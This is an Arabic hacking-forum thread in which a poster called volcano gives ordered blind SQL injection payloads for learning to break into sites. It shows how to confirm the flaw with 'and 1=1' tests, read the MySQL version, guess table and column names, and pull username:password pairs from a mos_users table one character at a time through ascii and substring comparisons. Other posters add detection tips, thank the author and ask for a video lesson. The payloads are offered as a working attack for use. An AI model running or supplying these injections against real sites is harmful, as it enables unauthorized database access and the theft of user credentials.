:: vBspiders Professional Network :: - ترتيب الخطوات للبلايد سكول

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)

- SQL قواعد البيانات (http://www.vbspiders.com/vb/f133.html)

- - ترتيب الخطوات للبلايد سكول (http://www.vbspiders.com/vb/t21709.html)

ترتيب الخطوات للبلايد سكول

ربنا يوفقني

volcano
بتعلم هكر البلايند
وان شاء الله ينجح بالتعليم

اقتباس:

volcano

بقلك فولكانو لا تفكر تخترق بالبلايند اذا ما بتعرف تقليدي

يلا نتابع

امر اكتشاف الخطأ

اقتباس:

2- امر التاكد من ان البلايند يعمل

اقتباس:

and (select 1)=1

3- امر معرفه اصدار القاعده

اقتباس:

and substring(@@version,1,1)=5

اقتباس:

and substring(@@version,1,1)=4

4- امر لمعرفه اسم الجدول نستعمل امر

اقتباس:

and (select 1 from table_name limit 0,1)=1

امر لمعرفه اسم عامود اليوزر والباسوورد نستعمل هذا الامر

اقتباس:

and (select substring(concat(1,column_name),1,1) from table_name limit 0,1)=1

6- اليوزر نيم والباسورد بحقنه واحده

اقتباس:

and (select substring(concat(1,concat(username,0x3a,password)) ,1,1) from mos_users limit 0,1)=1

اللعب مع تشفير
ascii
لاستخارج اليوزر والباسورد
فولكانو هكر تابع :)

اقتباس:

and ascii(substring((SELECT concat(username,0x3a,password) from mos_users limit 0,1),1,1))>1

هنا نزود باللعبه

على

اقتباس:

1,1))>1

سطر فولكانو الاحمر انتبه
-------------------volcano--------------------

اقتباس:

1,1))>2

اقتباس:

1,1))>3

وهكذا ليطلع لنا الخطا

ثم بعدها نلعب بنفس الطريقه لكن العد بكون هون

اقتباس:

2,1))>1

ونكمل بزياده على نفس الاسلوب
من عند سطر فولكانو الاحمر
السابق
لحتى يرجع لنا خطا
وهطذا

الان بس نخلص نجمع الارقام الي تطلع لنا

ونروح لهذا الموقع

اقتباس:

http://www.commentcamarche.net/co nt...ase/ascii.php3

لحتى نفك التشفير

بالتوفيق

ولا اخو 8898998
يسرق الموضوع لانه فهي اخطاء لسا ما خلصته
بس اخلصه بقلكم الطشوه يا 89088

يعطيك العافية

اضافة بسيطة لاكتشاف تغرة

كود PHP:

   +and+1=1

لا يحدث تغير لاكن عندما نضع

كود PHP:

   +and+1=0

يحدث تغير بصفحة لو بسيط او كبير او ممكن يظهر خطأ هكذا نعرف انها بلايند

وبالنسبة لمعرفة اصدار قاعدة

نضع

كود PHP:

   AND SUBSTRING(@@version,1,1)=4

اذا تغير محتوى صفحة يعني اصدار ليس 4

نجرب امر تالي

كود PHP:

   AND SUBSTRING(@@version,1,1)=5

اذا ما تغير هذا يعني انه الاصدار 5

ويعطيك العافية بانتظار جديدك يالغالي

يسلمو فايروس هكر ع الاضافه والتوضيح بارك الله فيك

الف الف شكر
الدرس بيساعد على تطبيق الثغره

مشكور فولكانو
مشكور

يسلمو يا حجاج

اول مرة بسمع فيها

يلا معاكم نتعلم شوو علينا :)

يعطيكم العافية شباب مبدعين

مشكور يا فولكانو

اقبل مروري

شـكــ وبارك الله فيك ـــرا لك

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

يسلمو اخى فولكانو
بس لازم تعملنا درس فيديو
لان الحوار ده كده قالب دماغى

مش قادر افكر فيه
ياريت اخى اكرمك الله تعرفلنا ما هو هاكر البلايند والكلام ده

ضرووووووووووووووووووووورى

الف الف شكر
الدرس بيساعد على تطبيق الثغره

بس يا ليت تسوي شرح في الفيديو حبيبي بكون اسهل علينا تقبل مروري

سهلت علينا والله يسلمو حبيبي

مشششكور والله يع‘ـطيك العافيه يـآمبـــــــــــدعَ

مشكور على الدرس الجميل
لكني عندي ملاحــظــة :D
الـ Blind SQL فرقها عن الـ SQL injection
شي بسيط الا وهو
الفرق الأساسي والوحيد بين هالنوعين ان الأول لا يظهر ناتج الاستعلامات.. والسبب برمجي لاغير << !!!!
في الثغرة التقليدية, سبب ظهور ارقام الاستغلال او الأعمدة وغيره هو وجود تعليمة print او echo في الكود لطباعة الأعمدة, في حال ماكانت موجودة فرح يظهرلك البلايند وقتها.
يعني لاتعتمد اعتماد كلي على علامــة '

شكرا لكن الموقع غير شغال http://www.commentcamarche.net/co%20...ase/ascii.php3

مشكووووووووووور اخي

جزاك الله كل خير

مشكوووووووووووورر رائع يا شباب

شكرا يا مان يعطيك الف عافيه

بارك الله فيك

وجزاك الله الجنه

شانكس فيري متش يا برنس